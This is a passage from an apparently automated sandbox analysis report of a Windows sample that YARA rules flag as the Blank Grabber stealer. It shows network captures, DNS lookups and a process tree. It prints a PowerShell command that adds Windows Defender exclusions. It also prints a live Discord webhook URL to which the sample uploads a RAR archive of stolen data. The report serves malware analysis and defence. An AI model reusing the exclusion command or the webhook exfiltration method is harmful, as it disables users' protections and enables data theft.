                                                            Jan 7, 2025 21:01:43.116173029 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:43.116187096 CET44349741162.159.135.232192.168.2.4
                                                            Jan 7, 2025 21:01:43.116226912 CET44349741162.159.135.232192.168.2.4
                                                            Jan 7, 2025 21:01:43.116231918 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:43.116274118 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:43.117274046 CET49741443192.168.2.4162.159.135.232
                                                            Jan 7, 2025 21:01:43.186898947 CET4974080192.168.2.4208.95.112.1
                                                            Jan 7, 2025 21:01:43.191900969 CET8049740208.95.112.1192.168.2.4
                                                            Jan 7, 2025 21:01:43.191941023 CET4974080192.168.2.4208.95.112.1
                                                            Jan 7, 2025 21:01:47.687114000 CET5711153192.168.2.4162.159.36.2
                                                            Jan 7, 2025 21:01:47.691946983 CET5357111162.159.36.2192.168.2.4
                                                            Jan 7, 2025 21:01:47.692027092 CET5711153192.168.2.4162.159.36.2
                                                            Jan 7, 2025 21:01:47.696881056 CET5357111162.159.36.2192.168.2.4
                                                            Jan 7, 2025 21:01:48.192750931 CET5711153192.168.2.4162.159.36.2
                                                            Jan 7, 2025 21:01:48.280793905 CET5711153192.168.2.4162.159.36.2
                                                            Jan 7, 2025 21:01:48.285883904 CET5357111162.159.36.2192.168.2.4
                                                            Jan 7, 2025 21:01:48.285934925 CET5711153192.168.2.4162.159.36.2
                                                            TimestampSource PortDest PortSource IPDest IP
                                                            Jan 7, 2025 21:01:08.031869888 CET5249453192.168.2.41.1.1.1
                                                            Jan 7, 2025 21:01:08.040952921 CET53524941.1.1.1192.168.2.4
                                                            Jan 7, 2025 21:01:12.682065964 CET5652553192.168.2.41.1.1.1
                                                            Jan 7, 2025 21:01:12.690218925 CET53565251.1.1.1192.168.2.4
                                                            Jan 7, 2025 21:01:40.997281075 CET4993653192.168.2.41.1.1.1
                                                            Jan 7, 2025 21:01:41.004223108 CET53499361.1.1.1192.168.2.4
                                                            Jan 7, 2025 21:01:41.776700974 CET5170453192.168.2.41.1.1.1
                                                            Jan 7, 2025 21:01:41.783473015 CET53517041.1.1.1192.168.2.4
                                                            Jan 7, 2025 21:01:47.681251049 CET5358240162.159.36.2192.168.2.4
                                                            Jan 7, 2025 21:01:48.464735985 CET53654861.1.1.1192.168.2.4
                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                            Jan 7, 2025 21:01:08.031869888 CET192.168.2.41.1.1.10x7fdcStandard query (0)blank-16pis.inA (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:01:12.682065964 CET192.168.2.41.1.1.10x52cdStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:01:40.997281075 CET192.168.2.41.1.1.10x882eStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:01:41.776700974 CET192.168.2.41.1.1.10x25cbStandard query (0)discord.comA (IP address)IN (0x0001)false
                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                            Jan 7, 2025 21:01:08.040952921 CET1.1.1.1192.168.2.40x7fdcName error (3)blank-16pis.innonenoneA (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:01:12.690218925 CET1.1.1.1192.168.2.40x52cdNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:01:41.004223108 CET1.1.1.1192.168.2.40x882eNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:01:41.783473015 CET1.1.1.1192.168.2.40x25cbNo error (0)discord.com162.159.135.232A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:01:41.783473015 CET1.1.1.1192.168.2.40x25cbNo error (0)discord.com162.159.137.232A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:01:41.783473015 CET1.1.1.1192.168.2.40x25cbNo error (0)discord.com162.159.128.233A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:01:41.783473015 CET1.1.1.1192.168.2.40x25cbNo error (0)discord.com162.159.136.232A (IP address)IN (0x0001)false
                                                            Jan 7, 2025 21:01:41.783473015 CET1.1.1.1192.168.2.40x25cbNo error (0)discord.com162.159.138.232A (IP address)IN (0x0001)false
                                                            • discord.com
                                                            • ip-api.com
                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.449731208.95.112.1801420C:\Users\user\AppData\Local\Temp\Built.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 7, 2025 21:01:12.716286898 CET117OUTGET /line/?fields=hosting HTTP/1.1
                                                            Host: ip-api.com
                                                            Accept-Encoding: identity
                                                            User-Agent: python-urllib3/2.3.0
                                                            Jan 7, 2025 21:01:14.063399076 CET175INHTTP/1.1 200 OK
                                                            Date: Tue, 07 Jan 2025 20:01:12 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Content-Length: 6
                                                            Access-Control-Allow-Origin: *
                                                            X-Ttl: 60
                                                            X-Rl: 44
                                                            Data Raw: 66 61 6c 73 65 0a
                                                            Data Ascii: false
                                                            Jan 7, 2025 21:01:14.065095901 CET175INHTTP/1.1 200 OK
                                                            Date: Tue, 07 Jan 2025 20:01:12 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Content-Length: 6
                                                            Access-Control-Allow-Origin: *
                                                            X-Ttl: 60
                                                            X-Rl: 44
                                                            Data Raw: 66 61 6c 73 65 0a
                                                            Data Ascii: false
                                                            Jan 7, 2025 21:01:14.065144062 CET175INHTTP/1.1 200 OK
                                                            Date: Tue, 07 Jan 2025 20:01:12 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Content-Length: 6
                                                            Access-Control-Allow-Origin: *
                                                            X-Ttl: 60
                                                            X-Rl: 44
                                                            Data Raw: 66 61 6c 73 65 0a
                                                            Data Ascii: false
                                                            Jan 7, 2025 21:01:14.065264940 CET175INHTTP/1.1 200 OK
                                                            Date: Tue, 07 Jan 2025 20:01:12 GMT
                                                            Content-Type: text/plain; charset=utf-8
                                                            Content-Length: 6
                                                            Access-Control-Allow-Origin: *
                                                            X-Ttl: 60
                                                            X-Rl: 44
                                                            Data Raw: 66 61 6c 73 65 0a
                                                            Data Ascii: false


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            1192.168.2.449740208.95.112.1801420C:\Users\user\AppData\Local\Temp\Built.exe
                                                            TimestampBytes transferredDirectionData
                                                            Jan 7, 2025 21:01:41.010040045 CET116OUTGET /json/?fields=225545 HTTP/1.1
                                                            Host: ip-api.com
                                                            Accept-Encoding: identity
                                                            User-Agent: python-urllib3/2.3.0
                                                            Jan 7, 2025 21:01:41.501972914 CET381INHTTP/1.1 200 OK
                                                            Date: Tue, 07 Jan 2025 20:01:41 GMT
                                                            Content-Type: application/json; charset=utf-8
                                                            Content-Length: 204
                                                            Access-Control-Allow-Origin: *
                                                            X-Ttl: 31
                                                            X-Rl: 43
                                                            Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 31 38 39 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 7d
                                                            Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-189.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.189"}


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            0192.168.2.449741162.159.135.2324431420C:\Users\user\AppData\Local\Temp\Built.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 20:01:42 UTC302OUTPOST /api/webhooks/1319333831601422477/Gz1lBx-zJ-f6c5VmTw7-Emfjq_tqsL0pI1D5turBQtQOU8FjLlkxesj3qj89-C61Kjse HTTP/1.1
                                                            Host: discord.com
                                                            Accept-Encoding: identity
                                                            Content-Length: 729612
                                                            User-Agent: python-urllib3/2.3.0
                                                            Content-Type: multipart/form-data; boundary=f3d0f4c2f8d39500f2ddb3ec81b69ca3
                                                            2025-01-07 20:01:42 UTC16384OUTData Raw: 2d 2d 66 33 64 30 66 34 63 32 66 38 64 33 39 35 30 30 66 32 64 64 62 33 65 63 38 31 62 36 39 63 61 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 42 6c 61 6e 6b 2d 6a 6f 6e 65 73 2e 72 61 72 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 52 61 72 21 1a 07 01 00 32 b3 53 c2 21 04 00 00 01 0f 6c dc d8 18 31 7d 8a 37 65 9e ea b1 a1 05 f3 f0 99 fe 9f 89 25 b5 1b ab 5b f5 da 10 70 cc 99 f1 fc 6a e4 16 06 5f 1e c8 fe 78 32 43 ac 79 32 3c 31 f6 3f ac 59 4d d0 ce 1b 12 70 5b 48 68 21 80 d1 07 a7 45 5d 99 4a 92 89 66 38 9a 2d 21 28 8b 95 a0 a0 b6 60 71
                                                            Data Ascii: --f3d0f4c2f8d39500f2ddb3ec81b69ca3Content-Disposition: form-data; name="file"; filename="Blank-user.rar"Content-Type: application/octet-streamRar!2S!l1}7e%[pj_x2Cy2<1?YMp[Hh!E]Jf8-!(`q
                                                            2025-01-07 20:01:42 UTC16384OUTData Raw: 51 2e 96 07 78 37 52 e3 9a e7 12 86 fa 27 01 c7 54 8d ab 33 eb dd 1b b0 bd f1 c6 d1 f2 97 60 ca 72 66 0c 13 70 8d ac 6b e8 d8 7d c9 0a 79 73 22 d3 9e 96 1b 88 ab 49 44 e7 62 a4 32 ab 00 1d ad 2b ce 1a 9f 9b a0 50 54 5d 24 1c 76 ec 68 b2 c7 a4 bc 47 5f 97 cd d5 a1 50 3a 1d 8e 60 17 96 87 fc 2a b5 da fc a1 da 9b e2 00 7e 30 37 b3 34 92 42 c9 90 62 8c 75 ef e6 fc 14 72 80 ce 91 20 db 56 95 5b 13 94 e1 1c 6b 92 ca 93 c2 6a 29 74 76 f9 ca ca 23 62 48 69 6a 0f de 18 e6 73 72 53 e0 cd 1b c8 df f0 86 e4 53 df 93 1f e9 90 db fb 73 1b d6 54 2b 3c f0 3e fc a2 b7 8a 26 a6 48 34 2f b0 99 53 84 32 6f cf 16 34 66 ec 5d f5 b2 2e 63 4b 6c 25 08 58 90 76 37 e1 4c 48 e6 74 03 bc 47 16 b0 83 30 8c ac f8 cf c5 50 1c 2d f9 10 f2 03 fe 85 b1 59 f1 8a 54 38 6c ec 18 ee 82 d7 b5
                                                            Data Ascii: Q.x7R'T3`rfpk}ys"IDb2+PT]$vhG_P:`*~074Bbur V[kj)tv#bHijsrSSsT+<>&H4/S2o4f].cKl%Xv7LHtG0P-YT8l
                                                            2025-01-07 20:01:42 UTC16384OUTData Raw: c0 84 c3 aa cf d3 0f 50 62 d1 92 99 4f 05 f6 02 4a 11 b9 eb e8 52 02 5d 48 5e c8 f5 ba cc 86 62 aa 1f 23 97 cd 0d 06 60 7b f3 2a 2b b5 f2 41 bc a6 8f 8b 0e d2 57 56 f8 db 0a 15 c2 5d 78 ec 9e bf 68 3e 9e c2 a1 f5 e0 ea 30 02 f9 14 28 5d 9a 39 7c 26 6e d0 1a 26 76 02 47 37 13 76 cf 2a d0 13 af 90 fc 94 3a 0f 21 ed 8b 61 81 80 81 4d 98 5e 86 f5 97 aa 66 c1 93 29 c4 78 40 f3 78 0b e3 f3 d0 97 7b df ef 87 19 90 01 f9 2a 85 f1 57 68 8f a3 f3 bb 04 b1 86 e9 f8 39 ac 8d 47 ff d0 80 f4 60 81 2e 8d db 34 2f 92 42 20 c6 1a 5e 49 91 e2 59 49 f0 de 92 bc f9 5a 5d 69 63 52 2d 49 12 07 39 3e 7d 7d d4 55 6d c1 3e 08 8b 33 dc 99 bd f6 05 e9 0c 6d df 73 a0 99 ab ee a4 30 ae 63 7c 0c ab 78 99 a9 f2 59 76 d8 ab bf a6 d5 72 1f 7c 65 7c 09 70 db e3 1f f5 a3 b4 3d 0b 81 83 2f
                                                            Data Ascii: PbOJR]H^b#`{*+AWV]xh>0(]9|&n&vG7v*:!aM^f)x@x{*Wh9G`.4/B ^IYIZ]icR-I9>}}Um>3ms0c|xYvr|e|p=/
                                                            2025-01-07 20:01:42 UTC16384OUTData Raw: ae 1f 2d 00 f5 4b 90 07 16 4c 24 95 f3 e5 dc 58 bd b6 a9 99 f3 06 95 26 e3 bf ef 9f e7 c0 2f b5 91 d9 f1 9b c0 41 b6 19 09 a9 76 83 1c 3a 54 4f 4e 56 b0 f3 37 00 a1 4a af ed 83 37 a3 71 3e 68 6c ad 91 6b 31 4b f1 84 94 14 38 ab 39 2b c8 fa d0 7e 6f 54 59 c0 c5 ee 62 37 15 f7 43 47 44 ed 20 99 11 bd 95 4e 1d b0 d6 68 a9 0b 46 7b 70 a3 25 c6 58 63 cd 88 1e 4a 95 e9 bd 6c 38 2c d5 f8 9d bb 5d b3 80 c0 41 77 9d 3c 77 3a 87 0f c7 73 bc bd 99 81 25 31 53 be 43 11 30 37 1c 23 f9 38 0c de 99 40 82 19 5c f7 90 91 fc aa 1d 85 8a d7 bd 3c 12 47 fa e9 4c 80 41 fa f5 5e 58 9a 30 59 9c cc 53 7c 4b 5e 71 d9 7b 93 c3 8c ca e4 31 bd 01 28 8c 0e ba d6 c0 78 5d 7e 6c 2c 7b 47 e8 ab fb 73 04 8e e1 57 0a 34 78 33 31 7f c2 7a b9 3b c5 05 9f 6e 73 a4 c3 77 22 a0 4a 8e 4c c5 bc
                                                            Data Ascii: -KL$X&/Av:TONV7J7q>hlk1K89+~oTYb7CGD NhF{p%XcJl8,]Aw<w:s%1SC07#8@\<GLA^X0YS|K^q{1(x]~l,{GsW4x31z;nsw"JL
                                                            2025-01-07 20:01:42 UTC16384OUTData Raw: a8 d9 13 51 61 91 27 58 26 c3 89 9f 6e 0d 16 1b e5 f2 a0 e3 b2 c7 71 9c 2d 2d af 23 14 ec 52 67 52 3d 85 d7 89 62 83 94 7e 56 fc 64 d6 7d 1f e0 f6 4c b9 7b 73 b0 bb 7d bd ea f1 80 cd 96 a6 34 88 ae c5 83 1a da 04 e2 66 ac c7 bb bf 2f 3a 42 55 97 d3 be 7d 7f 79 91 7a 2b 36 bc 8d aa bb 6f f6 e9 c7 de 91 16 42 de 3b 3f 75 da b8 5e 37 f0 3d 41 36 9a 73 4d e6 d0 ad e5 3a ef 85 e7 91 31 ec 3b 63 34 07 0f 6a 00 a5 86 79 15 09 19 2c c3 f3 e5 54 72 f4 10 77 32 9a 1d af ca bc b4 6e 20 0a 46 64 15 a3 60 9f 2c 8d 30 b5 9b 48 23 13 94 f0 df cd d7 a0 c7 aa 59 f2 1a 0f d8 6f 87 71 41 b4 a1 fb 3d e4 fc 4d a9 ee 72 13 30 87 08 86 35 11 94 ba 02 08 d6 1f 77 c2 31 aa 23 8d a4 1f 70 66 6f ca de a5 86 4f 5f 7e bd 91 07 4a ad 25 22 84 10 4d 68 7b 2b 0f 65 11 7c f5 97 bb 9f 74
                                                            Data Ascii: Qa'X&nq--#RgR=b~Vd}L{s}4f/:BU}yz+6oB;?u^7=A6sM:1;c4jy,Trw2n Fd`,0H#YoqA=Mr05w1#pfoO_~J%"Mh{+e|t
                                                            2025-01-07 20:01:42 UTC16384OUTData Raw: 4f 85 49 27 26 fa c2 56 d4 6a b7 06 64 30 3c 44 43 69 24 84 a9 7c 74 37 9e c3 19 c2 47 38 c5 66 e3 54 9b b2 c4 9b 8b 23 93 34 dd 6a a3 50 ab 6d c2 33 98 ba 77 21 8d ff 72 78 7a 99 3a 28 90 0b 57 ea 57 b6 01 43 4e f3 81 8e d4 a6 4e d5 e1 c7 ad 8a 69 16 60 01 6a 6e 1d 92 85 1f b8 24 de 2c b1 46 b4 4d 16 ee 91 94 2b f6 1b fe e5 06 bc 45 b8 ff ec ca 52 04 1a 27 28 61 24 83 55 d6 ce 80 5e 42 b0 8a 04 30 7e 23 df 65 1f d2 10 bd cd b0 02 00 fd 0f cb 4a 28 05 24 27 65 43 1e 8a 83 55 d5 f5 b8 b3 5f f6 88 7a 4b 4b fc af 55 2e 2e e1 8c 37 38 85 e3 04 70 d4 6a b5 6e 59 77 0f 4c 25 82 82 39 5b 0e d8 cb d7 29 14 1d a1 d0 a1 2d 17 4d b3 4f c8 ca 25 e7 9b d6 af 54 48 75 53 f4 a9 5d 85 26 fd 97 04 f4 c5 ed ce 91 d0 cc 8c f5 4a 35 7f 38 47 13 18 23 06 9a f8 64 36 20 ad 4a
                                                            Data Ascii: OI'&Vjd0<DCi$|t7G8fT#4jPm3w!rxz:(WWCNNi`jn$,FM+ER'(a$U^B0~#eJ($'eCU_zKKU..78pjnYwL%9[)-MO%THuS]&J58G#d6 J
                                                            2025-01-07 20:01:42 UTC16384OUTData Raw: 5f 77 2b fc eb bd 3b dc 80 91 e4 ec 1c 08 1e b8 5d 93 9f a2 b4 e9 07 f1 eb eb 72 43 9c 3c b9 b0 c3 94 d0 2e 0f d4 e7 5d ea 88 64 77 e0 2a 45 4f d6 be cb 9a 77 eb d5 ef 15 95 f4 f0 b7 58 05 a4 04 ab f9 44 45 ed 66 e5 ae a5 1b d4 e6 38 c1 39 df f8 1e c0 c2 04 ee 7f 00 b4 9e 59 19 ca c7 25 8d 4e d2 29 69 7f c3 54 20 53 c8 04 b7 d1 d3 1d a1 82 dd e6 d8 c0 4e b2 52 9a d7 46 f0 e8 71 07 c1 c7 64 fe e6 e1 b6 b5 57 c5 8b b0 74 0f bf 12 a5 9a 22 6d a8 6a 51 a8 0a 81 c1 44 f0 0d 46 f8 28 a2 2a 03 66 cd bc 64 d0 74 4f 0e 70 9c 25 9a e4 64 46 a9 76 cd c3 1f 17 4a 08 4e 39 21 9e 95 19 5e 2d 63 87 21 27 24 60 d0 26 10 46 b1 a2 95 db 44 f6 0c b0 03 db 7d 0f 8e fb 64 e2 0f 76 72 a1 81 a5 4e ad ce 5d fe 26 94 21 f7 6c 97 1d 2c a6 3b fd ef 39 e2 18 57 ce eb 8c 33 ff f9 a2
                                                            Data Ascii: _w+;]rC<.]dw*EOwXDEf89Y%N)iT SNRFqdWt"mjQDF(*fdtOp%dFvJN9!^-c!'$`&FD}dvrN]&!l,;9W3
                                                            2025-01-07 20:01:42 UTC16384OUTData Raw: 2e a3 e9 65 ad 64 4f 85 ff c7 e9 12 1b ea 79 7f 4b 35 17 9e 8b 0b 13 16 1a ea 43 df 9c 13 7d a7 ae d7 cc 8c 9f 16 e0 64 4e 54 58 58 e5 ee c2 8b 9a 98 da 6a 38 24 7d dd 01 fc 83 ac b9 0a 16 06 72 14 8d 42 73 42 87 f5 ec 68 75 32 34 9f a4 cf e0 c2 89 2d 9e 22 6c c2 b9 10 d8 c6 ac e1 fe 9e 8f 5d 9b 74 97 3a f7 79 4e 0a b8 53 f0 c3 e8 b5 e4 23 0c 13 7b b1 27 16 94 a5 06 cc 72 9d 89 7c 21 7c 55 5c 8a 56 fa 09 d5 8a f1 64 8f ae c6 98 76 5e 50 c2 24 77 9c dd 1b 11 34 5d cd ab 28 db c3 67 f3 2a 1c df e1 a8 02 22 d6 34 2b 76 0c 11 7e 66 5d e7 01 a6 2b fa ac 22 e4 64 75 50 9b f7 21 7e 68 2f 08 b8 a3 2c 2c d0 bd 6a 98 52 15 3e 92 d3 cd 30 f2 46 bf e5 fe 4a b6 20 0e 20 73 04 f2 8c 39 23 44 70 50 a4 f2 6e 97 f5 84 b1 44 60 02 75 5a eb b8 b3 fb 02 dc 84 3d 76 76 43 33
                                                            Data Ascii: .edOyK5C}dNTXXj8$}rBsBhu24-"l]t:yNS#{'r|!|U\Vdv^P$w4](g*"4+v~f]+"duP!~h/,,jR>0FJ s9#DpPnD`uZ=vvC3
                                                            2025-01-07 20:01:42 UTC16384OUTData Raw: 27 ef e3 90 fd 33 18 a2 55 ce ec 4e 8c 4b 03 da c4 91 dd 99 c5 ef 69 ae eb 27 7b d9 45 37 9b 15 a1 09 fa 8a 43 5e 0f b2 b0 84 e3 0a 33 b1 19 2d 17 89 ce f5 e7 38 3f 33 16 81 3f c0 14 55 88 38 a6 59 68 f3 89 f3 20 59 d3 58 29 96 b7 4e 00 5c 02 11 3c 7c 82 78 4b 6f 61 bf 21 0c 01 52 fc 76 b0 75 59 01 ec 0a f4 fe c9 2e c8 e2 39 07 b5 21 fb ce 70 8b e2 44 ec 04 eb 27 c1 3b a7 a7 1b 8c 14 ad 7f 8e e4 22 95 eb 49 8d 8f 50 3e a8 41 66 65 cc ec 49 b0 b9 21 9f 89 2f 85 ba 71 3e 2c 37 dc 77 d7 b4 8a 0a f7 bd e9 66 5d 15 09 76 af f4 f4 9c be 37 e7 62 9b b6 0b 02 f2 96 6b 8b 16 73 df b3 16 3b c6 26 1c e1 d9 7d 06 c5 a3 d8 e1 80 cd 6a 24 72 a3 86 6a 83 e6 4a 9e 44 fa 54 ff 5d 50 76 37 b2 a4 7d 52 64 de 47 6c 59 84 df 38 1b 42 af 12 69 66 fe 1c d5 f7 4c f4 5a 8d 42 d9
                                                            Data Ascii: '3UNKi'{E7C^3-8?3?U8Yh YX)N\<|xKoa!RvuY.9!pD';"IP>AfeI!/q>,7wf]v7bks;&}j$rjJDT]Pv7}RdGlY8BifLZB
                                                            2025-01-07 20:01:42 UTC16384OUTData Raw: 1c 0a ff b2 56 23 17 1e b3 bb e5 66 7c 94 43 36 f4 9b 6b 05 96 99 62 55 84 d9 93 37 25 73 c8 b7 68 f0 d5 4a 99 f3 c7 d4 96 55 51 b8 fa 55 0d b7 59 c5 37 57 53 0a 7f 6e c8 0b d4 a9 9b c6 4e b3 f8 93 b1 01 c8 f6 fe 50 62 59 1e 42 d6 10 9f 1f 44 bb 6e 94 55 4c ff 77 ae ea 1e ed f5 70 94 ec bb 11 85 8e 0f 6c 7c 42 93 a8 b4 46 df fa 82 72 80 a7 91 5a 49 58 cc 6b 43 24 57 06 1f 40 81 bf 8a da 1a 1d e5 f8 ef d6 49 d6 a2 51 3b 81 11 70 7c 3c f4 f3 ef fe fb ff 58 dd 48 0b 53 60 3b 16 e8 1f 88 f9 f4 90 5f fb 57 1b 4a 1b bc 34 14 2c 7e a7 65 3e 8b f3 f9 45 d4 33 09 43 43 85 70 28 b9 40 39 bb 19 22 23 64 b2 d7 b1 a5 18 4d a8 d7 45 e7 ee 67 6a 0a 5a f6 93 ea 99 7e 97 bd ce fe 07 ef e1 dd 65 8c 4f 0e 35 3e fd a4 df a6 16 d6 b9 d6 fe c0 c4 73 b7 22 b2 ab ca 3d 95 6e 27
                                                            Data Ascii: V#f|C6kbU7%shJUQUY7WSnNPbYBDnULwpl|BFrZIXkC$W@IQ;p|<XHS`;_WJ4,~e>E3CCp(@9"#dMEgjZ~eO5>s"=n'
                                                            2025-01-07 20:01:43 UTC1257INHTTP/1.1 200 OK
                                                            Date: Tue, 07 Jan 2025 20:01:43 GMT
                                                            Content-Type: application/json
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Set-Cookie: __dcfduid=373c7666cd3211ef84514ee658b32f41; Expires=Sun, 06-Jan-2030 20:01:43 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax
                                                            strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                            x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                            x-ratelimit-limit: 5
                                                            x-ratelimit-remaining: 4
                                                            x-ratelimit-reset: 1736280104
                                                            x-ratelimit-reset-after: 1
                                                            vary: Accept-Encoding
                                                            via: 1.1 google
                                                            alt-svc: h3=":443"; ma=86400
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xisDxo0CBCrxPkjxSmxthNR%2BLYZ%2Bq%2Bbf31wBsXwNckMax9LnHuS9JkdyuFqAhh53oVpMP8qHCs95ZKv%2BLIHaCWrRbaayq6RBKQqrv4VjyeU8Jf%2FKUHdyqBFDszpa"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            X-Content-Type-Options: nosniff
                                                            Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                            Set-Cookie: __sdcfduid=373c7666cd3211ef84514ee658b32f4198d536243a72f35b4e92a3159e8a52a293d0fd11ee7344a496046b5b777f1bfe; Expires=Sun, 06-Jan-2030 20:01:43 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/; SameSite=Lax


                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to dive into process behavior distribution

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:15:00:58
                                                            Start date:07/01/2025
                                                            Path:C:\Users\user\Desktop\47SXvEQ.exe
                                                            Wow64 process (32bit):true
                                                            Commandline:"C:\Users\user\Desktop\47SXvEQ.exe"
                                                            Imagebase:0x400000
                                                            File size:13'090'304 bytes
                                                            MD5 hash:CE5152D5376F6AD0C918FB893248DD08
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:1
                                                            Start time:15:01:03
                                                            Start date:07/01/2025
                                                            Path:C:\Users\user\AppData\Local\Temp\instals.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\AppData\Local\Temp\instals.exe"
                                                            Imagebase:0x7ff7f1460000
                                                            File size:5'264'896 bytes
                                                            MD5 hash:C289921058A4B38BDBD1373A0CBB757D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:2
                                                            Start time:15:01:03
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                                            Imagebase:0x7ff788560000
                                                            File size:452'608 bytes
                                                            MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:3
                                                            Start time:15:01:03
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\conhost.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                            Imagebase:0x7ff7699e0000
                                                            File size:862'208 bytes
                                                            MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            Target ID:4
                                                            Start time:15:01:03
                                                            Start date:07/01/2025
                                                            Path:C:\Users\user\AppData\Local\Temp\Built.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\AppData\Local\Temp\Built.exe"
                                                            Imagebase:0x7ff626640000
                                                            File size:6'259'986 bytes
                                                            MD5 hash:CF6FC2AEA60B6D65DCC9C16166C8161A
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000004.00000003.1710226799.0000021148F04000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000004.00000003.1710226799.0000021148F02000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                            Reputation:low
                                                            Has exited:true

                                                            Target ID:5
                                                            Start time:15:01:04
                                                            Start date:07/01/2025
                                                            Path:C:\Users\user\AppData\Local\Temp\Built.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Users\user\AppData\Local\Temp\Built.exe"
                                                            Imagebase:0x7ff626640000
                                                            File size:6'259'986 bytes
                                                            MD5 hash:CF6FC2AEA60B6D65DCC9C16166C8161A
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Yara matches:
                                                            • Rule: JoeSecurity_BlankGrabber, Description: Yara detected Blank Grabber, Source: 00000005.00000003.1724535496.000002B9B96E7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
